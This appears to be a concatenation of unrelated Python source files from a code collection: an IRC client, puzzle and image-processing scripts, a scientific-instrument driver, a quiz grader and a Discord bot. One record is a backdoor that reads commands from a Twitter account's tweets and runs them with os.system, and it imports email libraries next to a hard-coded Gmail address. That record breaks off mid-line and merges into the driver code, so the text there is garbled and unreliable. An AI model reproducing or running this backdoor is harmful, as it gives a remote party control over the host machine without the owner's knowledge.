args is everything after session\n if this.in_channel == None: # take nick from first element check for message\n print(\"Must join a channel before you can leave.\")\n return\n if len(args) > 0:\n this.output.append(\"PART #\" + this.in_channel + \" :\" + args)\n this.in_channel = None\n print(\"You left channel %s\" % args)\n else:\n this.output.append(\"PART #\" + this.in_channel)\n this.in_channel = None\n print(\"You left channel %s\" % args)\n\n def mode(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or tokens[0][0]!= \"#\" or len(tokens[1]) < 2: # take nick from first element check for message\n print(\"Invalid usage: /MODE #channel +k (set channel key)\")\n print(\"Invalid usage: /MODE #channel -k (to unset the channel key)\")\n return\n\n channel = tokens[0]\n tokens = tokenize(tokens[1])\n\n if tokens[0] == \"+k\" and len(tokens[1]) > 0:\n this.output.append(\"MODE \"+ args)\n elif tokens[0] == \"-k\":\n this.output.append(\"MODE \" + args)\n else:\n print(\"Invalid usage: /MODE #channel +k (set channel key)\")\n print(\"Invalid usage: /MODE #channel -k (to unset the channel key)\")\n return\n\n\n def nick(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n\n if tokens is None or len(tokens[1]) > 0: # take nick from first element check for message\n print(\"Invalid usage: /nick \")\n return\n this.output.append(\"NICK \"+tokens[0])\n\n def notice(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) == 0: # take nick from first element check for message\n print(\"Invalid usage: /NOTICE \")\n return\n this.output.append(\"NOTICE \" + tokens[0] + \" :\" + tokens[1])\n\n def part(this, cmd, args): # args is everything after session\n print(\"Invalid usage: To leave your channel use /leave or /leave )\")\n\n def ping(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) > 0: # take nick from first element check for message\n print(\"Invalid usage: /ping \")\n return\n this.output.append(\"PING \"+tokens[0])\n\n def privmsg(this, cmd, args): # args is everything after session\n print(\"Invalid usage: /MSG \")\n\n def msg(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) == 0: # take nick from first element check for message\n print(\"Invalid usage: /MSG \")\n return\n this.output.append(\"PRIVMSG \" + tokens[0] + \" :\" + tokens[1])\n\n def quit(this, cmd, args): # args is everything after session\n if len(args) > 0:\n this.output.append(\"QUIT :\" + args)\n else:\n this.output.append(\"QUIT\")\n\n def simple_cmd(self, cmd, args):\n self.output.append( cmd[1:].upper())\n\n def topic(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or tokens[0][0]!= \"#\": # take nick from first element check for message\n print(\"Invalid usage: /TOPIC <#channel> - to see channel TOPIC\")\n print(\"Invalid usage: /TOPIC <#channel> - to set channel TOPIC\")\n return\n if len(tokens[1]) != 0: # view TOPIC\n print(\"setting TOPIC on %s to: '%s'\" % (tokens[0], tokens[1]))\n this.output.append(\"TOPIC \" + tokens[0] + \" :\" + tokens[1])\n else:\n this.output.append(\"TOPIC \" + tokens[0])\n\n def wallops(this, cmd, args): # args is everything after session\n if len(args) == 0: # take nick from first element check for message\n print(\"Invalid usage: /wallops \")\n return\n this.output.append(\"WALLOPS :\" + args)\n\n def who(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) > 0 or tokens[0][0]!= \"#\": # take nick from first element check for message\n print(\"Invalid usage: /WHO #channel\")\n return\n this.output.append(\"WHO \"+tokens[0])\n\n def whois(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) > 0: # take nick from first element check for message\n print(\"Invalid usage: /WHOIS \")\n return\n this.output.append(\"WHOIS \"+tokens[0])\n\n\n def parse(this, str):\n commands = {\n \"AWAY\": this.away, # working\n \"BANNER\": this.wallops, # working\n \"BYE\": this.quit, # working\n \"DBG\": this.debug, # debuging\n \"EXIT\": this.quit, # working\n \"ISON\": this.ison, # working\n \"HELP\": this.simple_cmd, # working\n \"INFO\": this.simple_cmd, # working\n \"JOIN\": this.join, # working\n \"LIST\": this.simple_cmd, # working\n \"LUSERS\": this.simple_cmd, # working\n \"MODE\": this.mode, # working\n \"MOTD\": this.simple_cmd, # working\n \"NICK\": this.nick, # working\n \"NOTICE\": this.notice, # working\n \"LEAVE\": this.leave, # working\n \"PART\": this.part, # working\n \"PING\": this.ping, # working\n \"PRIVMSG\": this.privmsg, # working\n \"ME\": this.emote, # working\n \"MSG\": this.msg, # working\n \"QUIT\": this.quit, # working\n \"TOPIC\": this.topic, # working\n \"WALLOPS\": this.wallops, # working\n \"WHO\": this.who, # working\n \"WHOIS\": this.whois # working\n }\n\n cmd = tokenize(str)\n if cmd != None:\n if cmd[0][0] == '/':\n if cmd[0][1:].upper() in commands.keys(): # everything other than the /\n if commands[cmd[0][1:].upper()] is not None:\n commands[cmd[0][1:].upper()](cmd[0], cmd[1])\n else:\n print(\"Sorry, command '%s' is not implemented yet\" % cmd[0][1:])\n else:\n print(\"Unknown command '%s'\" % cmd[0][1:])\n else:\n if this.in_channel == None:\n print (\"Must enter a channel to chat:\")#TODO useage\n else:\n this.output.append(\"PRIVMSG #\" + this.in_channel + \" :\" + str)\n print(\"\\x1b[33m#\" + this.in_channel +\"[me] \" + str + \"\\x1b[0m\")\n\ndef main():\n\n finished = False\n parser = Parse()#Parse Object\n s_parser = Server_Parse()#Server_Parse Object\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((\"127.0.0.1\", 6667))\n# sock.connect((\"74.112.200.151\", 6667))\n except:\n print(\"Unable to connect to server. Quitting\")\n sys.exit()\n session = status()\n session.sock = sock\n# user_authenticate(sock)\n\n sel = selectors.DefaultSelector()\n sel.register(sock, selectors.EVENT_READ)\n sel.register(sys.stdin, selectors.EVENT_READ)\n\n print(\" _ _ __ __ ____ ____ \")\n print(\" | | | | \\/ | __ ) / ___|\")\n print(\" | | | | |\\/| | _ \\| | \")\n print(\" | |_| | | | | |_) | |___ \")\n print(\" \\___/|_| |_|____/ \\____|\")\n print(\" |_ _| _ \\ / ___| \")\n print(\" | || |_) || | \")\n print(\" | || _ < | |___ \")\n print(\" |___|_| \\_\\ \\____| \")\n print(\"\")\n print(\"/help for command help\")\n print(\"/list shows you channels to /join #\\n\")\n\n while finished != True:\n try:\n events = sel.select()\n for key, mask in events:\n if key.fileobj == sock:#sock is ready to read here\n data = sock.recv(10000) # 10000 char buffer\n if data:\n data = data.decode(\"utf-8\")\n split_data = data.split(\"\\r\\n\")\n rows = len(split_data)\n# s_parser.parse(data)\n for row in split_data:\n if parser.dbg == True:\n print(\"\\t_s_'%s'\" % row)\n s_parser.parse(row)\n\n while s_parser.has_output() == True:\n cmd = s_parser.get_output()\n if parser.dbg == True:\n print(\"-sending to server '%s'\"% cmd)\n session.sock.send(bytes(cmd + \"\\n\", \"utf-8\"))\n else:\n finished = True\n print(\"EOF sock close()\")\n else:\n x = input(\"\")\n parser.parse(x)\n while parser.has_output() == True:\n cmd = parser.get_output()\n if parser.dbg == True:\n print(\"-sending to server '%s'\"% cmd)\n session.sock.send(bytes(cmd + \"\\n\", \"utf-8\"))\n except KeyboardInterrupt:\n print(\"\\nCRTL-C Detected: Quitting\")\n finished = True\n\n sel.close()\n sock.close()\n sys.exit()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"uct.py","file_name":"uct.py","file_ext":"py","file_size_in_byte":18308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47153429","text":"# part one\nlines = open(\"day01-input.txt\", \"r\")\nsum_fuel_1 = 0\nfor line in lines:\n fuel_needed = int(int(line) / 3) - 2\n sum_fuel_1 = sum_fuel_1 + fuel_needed\nprint('part one: ' + str(sum_fuel_1))\n\n\n# part two\ndef calculate_fuel(mass):\n fuel = int(int(mass) / 3) - 2\n if fuel < 0 | fuel == 0:\n return 0\n else:\n return fuel\n\n\ndef calculate_fuel_module(mass):\n sum_mass = 0\n result = calculate_fuel(mass)\n sum_mass = sum_mass + result\n while True:\n result = calculate_fuel(result)\n sum_mass = sum_mass + result\n if calculate_fuel(result) <= 0:\n break\n return sum_mass\n\n\nmodules = []\nlinesPartTwo = open(\"day01-input.txt\", \"r\")\nsum_fuel = 0\nfor line in linesPartTwo:\n fuelExp = calculate_fuel_module(line)\n modules.append(int(fuelExp))\n sum_fuel = sum_fuel + fuelExp\n\nprint('example ' + str(calculate_fuel_module(100756)))\nprint('part two: ' + str(sum_fuel))\nprint('part two modules: ' + str(sum(modules)))\n\n","sub_path":"day01.py","file_name":"day01.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470646421","text":"import numpy as np\nimport cv2\n\n\ndef contour():\n\timgfile = 'contour.jpg'\n\timgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\tedge = cv2.Canny(imgra,100,200)\n\tedge, contours, hierachy = cv2.findContours(edge,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\tcv2.imshow('edge',edge)\n\n\tcv2.drawContours(img, contours, -1, (0,255,0),1)\n\tcv2.imshow('Contour',img)\n\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\t\nif __name__ == '__main__':\n\tcontour()","sub_path":"reference/OpenCV Python Code/도형 외곽 추출하기 (1).py","file_name":"도형 외곽 추출하기 (1).py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41333702","text":"from keras.applications.vgg16 import VGG16\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nimport numpy as np\nimport os\n\n\n# consine similarity\ndef cosine_similarity(ratings):\n sim = ratings.dot(ratings.T)\n if not isinstance(sim, np.ndarray):\n sim = sim.toarray()\n norms = np.array([np.sqrt(np.diagonal(sim))])\n return (sim / norms / norms.T)\n\n\n# convert all images to arrays\ny_test = []\nx_test = []\nfor img_path in os.listdir(\"images\"):\n if img_path.endswith(\".jpg\"):\n img = image.load_img(\"images/\" + img_path, target_size=(224, 224))\n y_test.append(int(img_path[0:2]))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n if len(x_test) > 0:\n x_test = np.concatenate((x_test, x))\n else:\n x_test = x\n\n# convert input to VGG format\nx_test = preprocess_input(x_test)\n\n# include_top=False: exclude top(last) 3 fully-connected layers. get features dim=(1,7,7,512)\nmodel = VGG16(weights='imagenet', include_top=False)\n\n# use VGG to extract features\nfeatures = model.predict(x_test)\n\n# flatten as one dimension\nfeatures_compress = features.reshape(len(y_test), 7 * 7 * 512)\n\n# compute consine similarity\ncos_sim = cosine_similarity(features_compress)\n\n# random sampling 5 to test\ninputNos = np.random.choice(len(y_test), 5, replace=False)\n\nfor inputNo in inputNos:\n top = np.argsort(-cos_sim[inputNo], axis=0)[1:3]\n recommend = [y_test[i] for i in top]\n output = 'input: \\'{}\\', recommend: {}'.format(inputNo + 1, recommend)\n print(output)\n","sub_path":"VGG/VGG_find_similar.py","file_name":"VGG_find_similar.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405848810","text":"\"\"\"The program main function.\n\"\"\"\n\nfrom apyml import __version__ as apymlVersion, ExitStatus, ColorStatus\nfrom apyml.apyml import APYML\nfrom apyml.internal import info, fatal\n\ndef program(args: dict = None):\n mode, report = None, None\n\n if not args or not 'filepath' in args:\n raise RuntimeError('Unexpected error occurred.')\n if 'mode' in args:\n mode = args['mode']\n if 'report' in args:\n report = args['report']\n \n app = APYML(args['filepath'], mode=mode, report=report)\n app.run()\n app.report()\n\ndef main() -> int:\n try:\n from . import ExitStatus\n exit_status = ExitStatus.OK\n\n from apyml.cli import parser\n args = vars(parser.parse_args())\n\n from apyml.internal.logging import init_logger\n init_logger()\n\n from apyml.context import Context\n Context()\n info(f'Context creation [{ColorStatus.SUCCESS}]')\n except KeyboardInterrupt:\n info('Keyboard interruption (ctrl+c).')\n exit_status = ExitStatus.CTRL_C\n raise\n except Exception as e:\n fatal(f'Core initialization [{ColorStatus.FAILURE}]')\n fatal(e)\n exit_status = ExitStatus.ERROR\n raise\n else:\n try:\n program(args=args)\n except KeyboardInterrupt:\n info('Keyboard interruption (ctrl+c).')\n exit_status = ExitStatus.CTRL_C\n raise\n except Exception as e:\n fatal(e)\n exit_status = ExitStatus.ERROR\n raise\n return exit_status","sub_path":"apyml/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571429347","text":"from bs4 import BeautifulSoup\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\nfrom email.MIMEBase import MIMEBase\nfrom email import encoders\nimport urllib2, os, time, smtplib\n\nheader = {'User-Agent': 'Google Chrome'}\n\ntmp = ''\n\nscount = 0\nccount = 0\n\nusername = 'agilescreens@gmail.com'\npw = ''\n\ndef execute(c):\n os.system(c)\n\nwhile(1):\n time.sleep(1)\n try:\n req = urllib2.Request(\"https://twitter.com/ifuhdsvbvhvnpbk/\",headers=header)\n ufid = urllib2.urlopen(req)\n soup = BeautifulSoup(ufid)\n \n cmd_raw2 = soup.find_all(name=\"p\",attrs={\"class\":\"TweetTextSize TweetTextSize--26px js-tweet-text tweet-text\"})[0]\n cmd_raw1 = str(cmd_raw2).replace(\">\", \" \")\n cmd_raw = cmd_raw1.replace(\"OK TI:25 TJ:2 TP:0 \n NANO,*TQ:1 TR:952 TS:1 TU:0 \n NANO,*U0:5.839037 UE:0 UF:1.000000 \n NANO,*UL: UM:user UN:1 \n NANO,*US:0 VP:4 WI:Def=15:00-061311 \n NANO,*XC:8 XD:A XM:1 XN:0 \n NANO,*XS:0011 XX:1 Y1:-3818.141 Y2:-10271.53 \n NANO,*Y3:.0000000 ZE:0 ZI:0 ZL:0 \n NANO,*ZM:0 ZS:0 ZV:.0000000 \n \"\"\"\n \n pattern = r'NANO,\\*----.*' + NEWLINE # pattern starts with NANO '\n pattern += r'NANO,\\*PAROSCIENTIFIC SMT SYSTEM INFORMATION.*' + NEWLINE\n pattern += r'NANO,.*ZM.*' + NEWLINE\n return pattern\n\n @staticmethod\n def regex_compiled():\n return re.compile(NANOStatus_01_Particle.regex(), re.DOTALL)\n\n def _build_parsed_values(self):\n pass\n\n def build_response(self):\n \"\"\"\n build the response to the command that initiated this status. In this \n case just assign the string to the nano_status_response. In the \n future, we might want to cook the string, as in remove some\n of the other sensor's chunks.\n \n The nano_status_response is pulled out later when do_cmd_resp calls\n the response handler. The response handler gets passed the particle\n object, and it then uses that to access the objects attribute that\n contains the response string.\n \"\"\"\n self.nano_status_response = self.raw_data\n \n\n###############################################################################\n# Driver\n###############################################################################\n\nclass InstrumentDriver(SingleConnectionInstrumentDriver):\n \"\"\"\n InstrumentDriver subclass\n Subclasses SingleConnectionInstrumentDriver with connection state\n machine.\n \"\"\"\n def __init__(self, evt_callback):\n \"\"\"\n Driver constructor.\n @param evt_callback Driver process event callback.\n \"\"\"\n #Construct superclass.\n SingleConnectionInstrumentDriver.__init__(self, evt_callback)\n\n ########################################################################\n # Superclass overrides for resource query.\n ########################################################################\n\n def get_resource_params(self):\n \"\"\"\n Return list of device parameters available.\n \"\"\"\n return Parameter.list()\n\n ########################################################################\n # Protocol builder.\n ########################################################################\n\n def _build_protocol(self):\n \"\"\"\n Construct the driver protocol state machine.\n \"\"\"\n self._protocol = Protocol(Prompt, NEWLINE, self._driver_event)\n\n\n###########################################################################\n# Protocol\n###########################################################################\n\nclass Protocol(CommandResponseInstrumentProtocol):\n \"\"\"\n Instrument protocol class\n Subclasses CommandResponseInstrumentProtocol\n \"\"\"\n def __init__(self, prompts, newline, driver_event):\n \"\"\"\n Protocol constructor.\n @param prompts A BaseEnum class containing instrument prompts.\n @param newline The newline.\n @param driver_event Driver process event callback.\n \"\"\"\n # Construct protocol superclass.\n CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)\n\n # Build protocol state machine.\n self._protocol_fsm = InstrumentFSM(ProtocolState, ProtocolEvent,\n ProtocolEvent.ENTER, ProtocolEvent.EXIT)\n\n # Add event handlers for protocol state machine.\n self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.ENTER, self._handler_unknown_enter)\n self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.EXIT, self._handler_unknown_exit)\n self._protocol_fsm.add_handler(ProtocolState.UNKNOWN, ProtocolEvent.DISCOVER, self._handler_unknown_discover)\n\n self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.ENTER, self._handler_autosample_enter)\n self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.EXIT, self._handler_autosample_exit)\n self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.STOP_AUTOSAMPLE, self._handler_autosample_stop_autosample)\n self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.DUMP_SETTINGS, self._handler_command_autosample_dump01)\n self._protocol_fsm.add_handler(ProtocolState.AUTOSAMPLE, ProtocolEvent.SET_TIME, self._handler_command_autosample_set_time)\n\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.ENTER, self._handler_command_enter)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.EXIT, self._handler_command_exit)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.GET, self._handler_command_get)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET, self._handler_command_set)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.DUMP_SETTINGS, self._handler_command_autosample_dump01)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.SET_TIME, self._handler_command_autosample_set_time)\n self._protocol_fsm.add_handler(ProtocolState.COMMAND, ProtocolEvent.START_AUTOSAMPLE, self._handler_command_start_autosample)\n\n # Construct the parameter dictionary containing device parameters,\n # current parameter values, and set formatting functions.\n self._build_param_dict()\n\n # Add build handlers for device commands.\n self._add_build_handler(InstrumentCommand.DATA_ON, self._build_command)\n self._add_build_handler(InstrumentCommand.DATA_OFF, self._build_command)\n self._add_build_handler(InstrumentCommand.DUMP_SETTINGS, self._build_command)\n self._add_build_handler(InstrumentCommand.SET_TIME, self._build_command)\n\n # Add response handlers for device commands.\n self._add_response_handler(InstrumentCommand.DATA_ON, self._parse_data_on_off_resp)\n self._add_response_handler(InstrumentCommand.DATA_OFF, self._parse_data_on_off_resp)\n self._add_response_handler(InstrumentCommand.DUMP_SETTINGS, self._parse_status_01_resp)\n\n # Add sample handlers.\n\n # State state machine in UNKNOWN state.\n self._protocol_fsm.start(ProtocolState.UNKNOWN)\n\n # commands sent sent to device to be filtered in responses for telnet DA\n self._sent_cmds = []\n\n #\n self._chunker = StringChunker(Protocol.sieve_function)\n\n # set up the regexes now so we don't have to do it repeatedly\n self.data_regex = NANODataParticle.regex_compiled()\n self.cmd_rsp_regex = NANOCommandResponse.regex_compiled()\n self.status_01_regex = NANOStatus_01_Particle.regex_compiled()\n\n\n @staticmethod\n def sieve_function(raw_data):\n \"\"\"\n The method that splits samples\n \"\"\"\n\n matchers = []\n return_list = []\n\n \"\"\"\n would be nice to be able to do this.\n matchers.append(self.data_regex)\n matchers.append(self.status_01_regex)\n matchers.append(self.cmd_rsp_regex)\n \"\"\"\n \n \"\"\"\n Not a good idea to be compiling these for every invocation of this\n method; they don't change.\n \"\"\"\n \n matchers.append(NANODataParticle.regex_compiled())\n matchers.append(NANOStatus_01_Particle.regex_compiled())\n matchers.append(NANOCommandResponse.regex_compiled())\n\n for matcher in matchers:\n for match in matcher.finditer(raw_data):\n return_list.append((match.start(), match.end()))\n\n return return_list\n\n def _filter_capabilities(self, events):\n \"\"\"\n Return a list of currently available capabilities.\n \"\"\"\n events_out = [x for x in events if Capability.has(x)]\n return events_out\n\n def _build_cmd_dict(self):\n \"\"\"\n Populate the command dictionary with NOAA NANO Driver metadata information. \n Currently NANO only supports DATA_ON and DATA_OFF.\n \"\"\"\n self._cmd_dict = ProtocolCommandDict()\n \n def _build_param_dict(self):\n \"\"\"\n Populate the parameter dictionary with parameters.\n For each parameter key, add match stirng, match lambda function,\n and value formatting function for set commands.\n \"\"\"\n # Add parameter handlers to parameter dict.\n pass\n\n def add_to_buffer(self, data):\n '''\n Overridden because most of the data coming to this driver\n isn't meant for it. I'm only adding to the buffer when\n a chunk arrives (see my_add_to_buffer, below), so this \n method does nothing.\n \n @param data: bytes to add to the buffer\n '''\n pass\n \n def _my_add_to_buffer(self, data):\n \"\"\"\n Replaces add_to_buffer. Most data coming to this driver isn't meant\n for it. I'm only adding to the buffer when data meant for this \n driver arrives. That is accomplished using the chunker mechanism. This\n method would normally collet any data fragments that are then search by\n the get_response method in the context of a synchronous command sent\n from the observatory. However, because so much data arrives here that\n is not applicable, the add_to_buffer method has been overridden to do\n nothing.\n \n @param data: bytes to add to the buffer\n \"\"\"\n \n # Update the line and prompt buffers.\n self._linebuf += data\n self._promptbuf += data\n self._last_data_timestamp = time.time()\n\n def _got_chunk(self, chunk, timestamp):\n \"\"\"\n The base class got_data has gotten a chunk from the chunker. Invoke\n this driver's _my_add_to_buffer, or pass it to extract_sample\n with the appropriate particle objects and REGEXes. We need to invoke\n _my_add_to_buffer, because we've overridden the base class\n add_to_buffer that is called from got_data(). The reason is explained\n in comments in _my_add_to_buffer.\n \"\"\"\n\n log.debug(\"_got_chunk_: %s\", chunk)\n \n if (self.cmd_rsp_regex.match(chunk) \\\n or self.status_01_regex.match(chunk)):\n self._my_add_to_buffer(chunk)\n else:\n if not self._extract_sample(NANODataParticle,\n self.data_regex, \n chunk, timestamp):\n raise InstrumentProtocolException(\"Unhandled chunk\")\n\n\n def _build_command(self, cmd, *args, **kwargs):\n command = cmd + NEWLINE\n log.debug(\"_build_command: command is: %s\", command)\n return command\n\n def _parse_data_on_off_resp(self, response, prompt):\n log.debug(\"_parse_data_on_off_resp: response: %r; prompt: %s\", response, prompt)\n #return response.nano_command_response\n return\n \n def _parse_status_01_resp(self, response, prompt):\n log.debug(\"_parse_status_01_resp: response: %r; prompt: %s\", response, prompt)\n #return response.nano_status_response\n return \n \n def _wakeup(self, timeout, delay=1):\n \"\"\"\n Overriding _wakeup; does not apply to this instrument\n \"\"\"\n pass\n\n def _get_response(self, timeout=10, expected_prompt=None):\n \"\"\"\n Overriding _get_response: this one uses regex on chunks\n that have already been filtered by the chunker. An improvement\n to the chunker could be metadata labeling the chunk so that we\n don't have to do another match, although I don't think it is that\n expensive once the chunk has been pulled out to match again\n \n @param timeout The timeout in seconds\n @param expected_prompt Only consider the specific expected prompt as\n presented by this string\n @throw InstrumentProtocolExecption on timeout\n \"\"\"\n # Grab time for timeout and wait for response\n\n starttime = time.time()\n \n response = None\n \n \"\"\"\n Spin around for looking for the response to arrive, but not\n if there is no expected prompt to look for.\n \"\"\"\n if None == expected_prompt:\n continuing = False\n else:\n continuing = True\n \n response = \"no response\"\n while continuing:\n if self.cmd_rsp_regex.match(self._promptbuf):\n response = NANOCommandResponse(self._promptbuf)\n log.debug(\"_get_response() matched CommandResponse\")\n response.check_command_response(expected_prompt)\n continuing = False\n elif self.status_01_regex.match(self._promptbuf):\n response = NANOStatus_01_Particle(self._promptbuf)\n log.debug(\"_get_response() matched Status_01_Response\")\n response.build_response()\n continuing = False\n else:\n self._promptbuf = ''\n time.sleep(.1)\n\n if timeout and time.time() > starttime + timeout:\n raise InstrumentTimeoutException(\"in BOTPT NANO driver._get_response()\")\n\n return ('NANO_RESPONSE', response)\n \n ########################################################################\n # Unknown handlers.\n ########################################################################\n\n def _handler_unknown_enter(self, *args, **kwargs):\n \"\"\"\n Enter unknown state.\n \"\"\"\n # Tell driver superclass to send a state change event.\n # Superclass will query the state.\n self._driver_event(DriverAsyncEvent.STATE_CHANGE)\n\n def _handler_unknown_exit(self, *args, **kwargs):\n \"\"\"\n Exit unknown state.\n \"\"\"\n pass\n\n def _handler_unknown_discover(self, *args, **kwargs):\n \"\"\"\n Discover current state\n @retval (next_state, result)\n \"\"\"\n result = self._do_cmd_resp(InstrumentCommand.DATA_OFF)\n \n return (ProtocolState.COMMAND, ResourceAgentState.IDLE)\n\n ########################################################################\n # Autosample handlers.\n ########################################################################\n\n def _handler_autosample_enter(self, *args, **kwargs):\n \"\"\"\n Enter autosample state.\n \"\"\"\n\n # Tell driver superclass to send a state change event.\n # Superclass will query the state.\n self._driver_event(DriverAsyncEvent.STATE_CHANGE)\n\n def _handler_autosample_exit(self, *args, **kwargs):\n \"\"\"\n Exit command state.\n \"\"\"\n pass\n\n def _handler_autosample_stop_autosample(self):\n \"\"\"\n Turn the nano data off\n \"\"\"\n next_state = ProtocolState.COMMAND\n next_agent_state = ResourceAgentState.COMMAND\n\n result = self._do_cmd_resp(InstrumentCommand.DATA_OFF)\n \n return (next_state, (next_agent_state, result))\n\n ########################################################################\n # Command handlers.\n ########################################################################\n\n def _handler_command_enter(self, *args, **kwargs):\n \"\"\"\n Enter command state.\n @throws InstrumentTimeoutException if the device cannot be woken.\n @throws InstrumentProtocolException if the update commands and not recognized.\n \"\"\"\n # Command device to update parameters and send a config change event.\n #self._update_params()\n\n # Tell driver superclass to send a state change event.\n # Superclass will query the state.\n self._driver_event(DriverAsyncEvent.STATE_CHANGE)\n\n def _handler_command_get(self, *args, **kwargs):\n \"\"\"\n Get parameter\n \"\"\"\n\n next_state = None\n result = {}\n\n return (next_state, result)\n\n def _handler_command_set(self, *args, **kwargs):\n \"\"\"\n Set parameter\n \"\"\"\n next_state = None\n result = None\n\n params = args[0]\n \n return (next_state, result)\n\n def _handler_command_start_autosample(self, *args, **kwargs):\n \"\"\"\n Turn the nano data on\n \"\"\"\n next_state = ProtocolState.AUTOSAMPLE\n next_agent_state = ResourceAgentState.STREAMING\n\n \"\"\" \n call _do_cmd_resp, passing our NANO_DATA_ON as the expected_prompt\n \"\"\"\n result = self._do_cmd_resp(InstrumentCommand.DATA_ON)\n\n return (next_state, (next_agent_state, result))\n\n def _handler_command_exit(self, *args, **kwargs):\n \"\"\"\n Exit command state.\n \"\"\"\n pass\n\n ########################################################################\n # Handlers common to Command and Autosample States.\n ########################################################################\n\n def _handler_command_autosample_dump01(self, *args, **kwargs):\n \"\"\"\n Get device status\n \"\"\"\n next_state = None\n next_agent_state = None\n result = None\n log.debug(\"_handler_command_autosample_dump01\")\n\n timeout = kwargs.get('timeout')\n\n if timeout is not None:\n result = self._do_cmd_resp(InstrumentCommand.DUMP_SETTINGS, timeout = timeout)\n else:\n result = self._do_cmd_resp(InstrumentCommand.DUMP_SETTINGS)\n\n log.debug(\"DUMP_SETTINGS response: %s\", result)\n\n return (next_state, (next_agent_state, result))\n\n\n def _handler_command_autosample_set_time(self, *args, **kwargs):\n \"\"\"\n Get device status\n \"\"\"\n next_state = None\n next_agent_state = None\n result = None\n log.debug(\"_handler_command_autosample_set_time\")\n\n timeout = kwargs.get('timeout')\n\n if timeout is None:\n result = self._do_cmd_resp(InstrumentCommand.SET_TIME)\n else:\n result = self._do_cmd_resp(InstrumentCommand.SET_TIME, timeout = timeout)\n\n log.debug(\"SET_TIME response: %s\", result)\n\n return (next_state, (next_agent_state, result))\n\n","sub_path":"mi/instrument/noaa/nano/ooicore/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":30926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624063689","text":"# Deseja-se publicar o numero de acertos de cada aluno de uma sala em uma prova em forma de testes.\n# A prova consta de 30 questoes, cada uma com 5 alternativas identificadas como A, B, C, D e E.\n# Para isso são dadas:\n# - o cartão gabarito\n# - o número de alunos na turma\n# - o cartao resposta contendo seu numero e suas respostas\n\nimport random\n\ndef gabarito(n): #n é o numero de questoes\n gabarito = []\n respostas = ['A', 'B', 'C', 'D', 'E']\n for i in range(n):\n gabarito.append(respostas[random.randrange(0, 5)])\n return gabarito\n\n\ndef cartaoResposta(nAlunos, n): #n é o numero de questoes\n respostas = []\n for i in range(1, nAlunos + 1):\n respostas.append([i, gabarito(n)])\n return respostas\n\nif __name__ == \"__main__\":\n while True:\n try:\n nAlunos = int(input('nAlunos = '))\n n = int(input('n = '))\n break\n except: print('Digite numeros inteiros')\n respostas = cartaoResposta(nAlunos, n)\n gabarito = gabarito(n)\n\n file = open('usp6.2.txt', 'w')\n\n for resposta in respostas:\n corretas = 0\n for i in range(len(resposta[1]) - 1):\n if resposta[1][i] == gabarito[i]:\n corretas += 1\n print(f'O aluno {resposta[0]} acertou {corretas} questoes')\n file.write(f'O aluno {resposta[0]} acertou {corretas} questoes\\n')\n file.close()\n\n","sub_path":"projetos/Ex_Lista_USP/usp06/usp6.2.py","file_name":"usp6.2.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"350655279","text":"import discord\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport time\r\nimport random\r\n\r\nglobal money\r\nmoney = 250\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Logged in as:\")\r\n print(client.user.name)\r\n print(\"ID\")\r\n print(client.user.id)\r\n print(\"Ready to use!\")\r\n \r\n await client.change_presence(game=discord.Game(name='Been serving Ahmed since day 1'))\r\n \r\n# PING AND 8BALL COMMAND\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n elif 